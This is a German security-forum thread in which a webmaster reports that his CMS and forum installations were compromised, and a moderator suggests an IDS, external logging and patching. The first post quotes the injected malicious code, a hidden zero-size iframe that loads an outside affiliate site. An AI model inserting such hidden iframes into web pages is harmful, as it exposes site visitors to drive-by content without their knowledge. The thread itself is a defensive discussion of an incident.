Hackerboard Wiki HaboBlog
Hackerboard bei Facebook Hackerboard bei Google+ Hackerboard bei Twitter

[HaBo]

 
Webmaster-Security Fragen zur richtigen Serverkonfiguration oder Absicherung dynamischer Scripte gehören hier hinein.

Wurm legt ganzen Webspace lahm

Diskussion: Wurm legt ganzen Webspace lahm im Forum Webmaster-Security, in der Kategorie Security Area; Anzeige Mein Webspace erlag letzter Nacht einer "Wurm-Attacke" oder was immer das war. So gegen 5.00 Uhr morgens entdeckte ich ...

Antwort
Alt 20.05.07, 14:58   #1 (permalink)
 
Registriert seit: 25.12.04
stone.dr Leistung: Facit NTK
Likes: 0
Standard Wurm legt ganzen Webspace lahm

Anzeige

Mein Webspace erlag letzter Nacht einer "Wurm-Attacke" oder was immer das war.
So gegen 5.00 Uhr morgens entdeckte ich beim installieren eines neuen CMS (e107) einige Ungereimtheiten beim installieren.
Im ACP bekam ich die Meldung, dass 2 Files in einem Ordner waren, die da nicht hingehören.

Beim genaueren hinsehen machte sich schon das ausmaß der Zerstörung sichtbar.

In 2 CMS (e107 Mainseite und Subdomain), sowie in 3 Woltlab Burning Boards 2.3.6 pl1 (acp htaccess) waren mit folgendem code verseucht:

Code:
html><iframe width=0 height=0 frameborder=0 src=http://www.free20.com/portal/index.php?aff=razec marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>
Der code ist c.a. 10 mal "eingebaut"

Habe 2 Stunden die Serverlogfiles durchsucht, obs Zugriffe auf eine evtl. installierte Shell gab.
Also ich mich ins confixx einloggen wollte (so gegen 10 Uhr heute morgen), musste ich feststellen, dass sogar der Login darin infiziert war.

Meine Frage jetzt - welche Möglichkeiten habe ich um mich gegen solche Angriffe zu schützen.
Kann es sein, dass "der Wurm" evtl. über eine eingeschleuste Shell auf den Webspace kam?
Der ganze Server scheint infiziert zu sein (habe ja wie gesagt nur Webspace).
Global_Register ist Serverseitig auf off gestellt und beim überprüfen des Stammverzeichnisses mit einer c99 Shell wurde der status secure angezeigt.

Eine wirklich ärgerliche Sache, die mir echt auf den Magen schlägt ( und auf meine Schlafgewohnheiten, bin immmer noch wach ... :( )
stone.dr ist offline   Mit Zitat antworten
Alt 20.05.07, 18:20   #2 (permalink)
Moderator
 
Benutzerbild von Elderan
 
Registriert seit: 30.03.04
Elderan Leistung: 8086
Likes: 14
Standard

Hallo,
das Beste ist eine (externe) IDS und ein externer Logfile-Server. Mit diesen beiden Mitteln kann man eigentlich sehr schnell ausmachen, was die Ursache dafür war (sofern man es nicht mit einem sehr guten Cracker zu tun hat), woher er kam, welche Lücken er ausgenutzt hat etc.

Da du aber nur Webspace hast, wird das wohl schwer.
Naja sonst evt. mal die PHP Version überprüfen, ob es die neuste ist, weil der März (?) ja der Month of PHP Bugs war, und evt. fährst du noch mit einer alten, unsicheren Version.

Dann als nächstest überprüfen, ob dass CMS, die Boards, Confixx und ähnliches Lücken aufweisen die bekannt sind und evt. auf den neusten Stand bringen.


PS: Was macht man denn schon um 5 Uhr morgens??
Elderan ist offline   Mit Zitat antworten
Antwort
   
- Anzeige -

Werbung ist gerade online    

[HaBo] » Security Area » Webmaster-Security » Wurm legt ganzen Webspace lahm
Themen-Optionen
Ansicht

Forumregeln
Es ist Ihnen nicht erlaubt, neue Themen zu verfassen.
Es ist Ihnen nicht erlaubt, auf Beiträge zu antworten.
Es ist Ihnen nicht erlaubt, Anhänge hochzuladen.
Es ist Ihnen nicht erlaubt, Ihre Beiträge zu bearbeiten.

BB-Code ist an.
Smileys sind an.
[IMG] Code ist an.
HTML-Code ist aus.
Trackbacks sind aus
Pingbacks sind aus
Refbacks sind aus


Ähnliche Themen
Thema Autor Forum Antworten Letzter Beitrag
Firefox 3 legt einen "Desktop" Ordner an xeno Applikationen 8 17.08.08 14:53
Microsoft legt Schnittstellen offen lBr1anl News & Ankündigungen 16 24.02.08 12:42
Bootproblem (kaputter PC legt Zweitpc lahm und läuft anschließend wieder) da_jupp Die Problemzone 0 28.06.07 15:58
Virus der den CPU-Lüfter lahm legt??? Cracker Die Problemzone 6 02.07.05 21:13
Wurm legt Teile des Internet lahm Mackz News & Ankündigungen 0 25.01.03 20:07


1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61